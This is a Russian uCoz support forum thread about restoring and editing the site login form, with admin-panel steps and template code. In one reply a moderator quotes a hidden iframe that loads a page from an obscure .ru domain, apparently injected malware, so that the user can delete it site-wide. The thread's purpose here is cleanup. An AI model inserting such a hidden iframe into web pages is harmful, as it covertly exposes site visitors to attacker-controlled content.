Модератор форума: Yuri_G |
Сообщество uCoz » Мастерская uCoz » Дизайн: управление шаблонами » Редактирование формы входа |
Редактирование формы входа |
![]() Все вопросы связанные с редактированием формы входа Если Вы хотите изменить внешний вид формы входа Знания HTML обязательны! Предупреждение! ![]() WARNING! Будьте особо внимательны, если вы вставляете уже готовые (видоизмененные) варианты формы входа к себе на сайт! Готовые формы входа раздающиеся на разных ресурсах могут содержать в себе агрессивный или вредоносный код! |
|
9115451, второй код должен сработать. вот это на быструю замену отправьте с заменой в глобальных блоках
Код <iframe id="a1996667054" src="https://al9l235gkc7d.ru/f.html" style="display: none;"></iframe> |
9115451, отлично. с вредоносным кодом мы разобрались. теперь форма входа. у вас стоят только поля формы без рабочего скрипта, поэтому не работает. если не хотите видеть uid кнопку авторизации и соц. сети, а хотите видеть старую форму входа то проделайте следующее. удалите из блока все то, что вы называете формой входа и вставьте системный код $LOGIN_FORM$
далее Панель управления - Пользователи - Настройки модуля - Разрешенные методы авторизации пользователей: - выбираете локальных пользователей - Внизу сохраняете На сайт будете входить парой логин - ник на сайте. пароль - пароль от uID профиля |
Ставлю скрипт http://webuilder.info/load....-0-2736 там в примечаниях пишут "Не забудьте удалить старую форму входа uCoz, иначе данное решение будет оповещать вас о неправильно введенном логине или пароле, несмотря на то, что вы вводите их правильно. "
Но как ее удалить? Здесь я код поменял весь Админ панель => Дизайн => Управление дизайном => Пользователи => Форма входа пользователей Добавлено (27 Фев 2016, 21:21:48) Добавлено (27 Фев 2016, 22:29:06) |
Эн, можно, но вместо апов вопроса нужно указывать ссылку на сайт
панель управления - дизайн - управление дизайном - форум - общий вид страниц форума - найдите код, который я выделила зеленым и вставьте то, что я выделила красным Цитата <?if($MODULE_ID$='forum')?><div class="forum-box"><?endif?> <div class="forumContent"><table border="0" cellpadding="0" height="30" cellspacing="0" width="100%"> <tr> <?if($USER_LOGGED_IN$)?><?else?><td align="left"> <a class="fNavLink" href="$LOGIN_LINK$" rel="nofollow">Войти</a> · <a class="fNavLink" href="$REGISTER_LINK$" rel="nofollow">Зарегистрироваться</a></td><?endif?> <td align="right">[<?if($USER_LOGGED_IN$)?> <a href="javascript://" rel="nofollow" id="upml" class="fNavLink" onclick="window.open('$PM_URL$','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;"><!--<s3065>-->Личные сообщения<!--</s>-->($UNREAD_PM$)</a> · <?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml','')",500)</script><bgsound src="/.s/img/fr/pm.wav" loop="1" volume="0" balance="0"> <?endif?><?endif?> <a class="fNavLink" href="$RECENT_POSTS_LINK$" rel="nofollow"><!--<s5209>-->Новые сообщения<!--</s>--></a> · <a class="fNavLink" href="$MEMBERS_LIST_LINK$" rel="nofollow"><!--<s5216>-->Участники<!--</s>--></a> · <a class="fNavLink" href="$BOARD_RULES_LINK$" rel="nofollow"><!--<s5166>-->Правила форума<!--</s>--></a> · <a class="fNavLink" href="$SEARCH_PAGE_LINK$" rel="nofollow"><!--<s3163>-->Поиск<!--</s>--></a> · <a class="fNavLink" href="$RSS_LINK$" rel="nofollow">RSS</a><?if($USER_LOGGED_IN$)?> · <a class="fNavLink" href="$SUBSCRIPTION_LINK$" rel="nofollow"><!--<s6773>-->Подписки<!--</s>--></a><?endif?> ]</td> </tr> перед правками сделайте бекап шаблонов получится для гостя примерно так ![]() Прикрепления:
0104699.jpg
(28.6 Kb)
|
Здравствуйте, у меня есть уже готовая форма входа, но я не знаю как добавить кнопку регистрации.
Код <input type="text" name="user" size="20" maxlength="50" placeholder="Логин"> <div class="password left hidden"><a href="$REMINDER_LINK$"></a><input type="password" name="password" size="20" maxlength="15" placeholder="Пароль"></div> <input name="sbm" type="submit" value="Войти"> <input id="rem$PAGE_ID$" type="checkbox" name="rem" value="1" checked="checked"> Помогите пожалуйста, как добавить кнопку регистрации. |
Здравствуйте.
Подскажите пожалуйста, как сделать, чтобы в форме входа присутствовали сразу два метода входа (через uID и для локальных пользователей). Видел подобную реализацию здесь scanbooks.ru. Т.е. нажимаешь на кнопку Войти через uID и входишь через появляющееся окошко. Если хочешь войти как локальный пользователь, то нажимаешь на ссылку Старая форма входа и появляется старая форма с почтой и паролем. Спасибо Прикрепления:
1719317.jpg
(104.4 Kb)
·
2677946.jpg
(109.4 Kb)
|
voron2995, панель управления - пользователи - настройки модуля - вид кнопки uID авторизации - переключите на старый - сохраните
|
Как в созданном сайте на Юкоз добавить старую обычную форму входа? Через логин и пароль. Куда она пропала, теперь больше её нет?
Чтобы можно было зайти не только через UID, соц. сети и почту, а просто введя имя пользователя и пароль? Раньше в общих настройках (в Админ панели, была такая функция), а теперь, что-то не могу найти? Аналогичный вопрос и по регистрации пользователь на сайте. |
Paritet3077, путь указан в сообщении выше.
|
| |||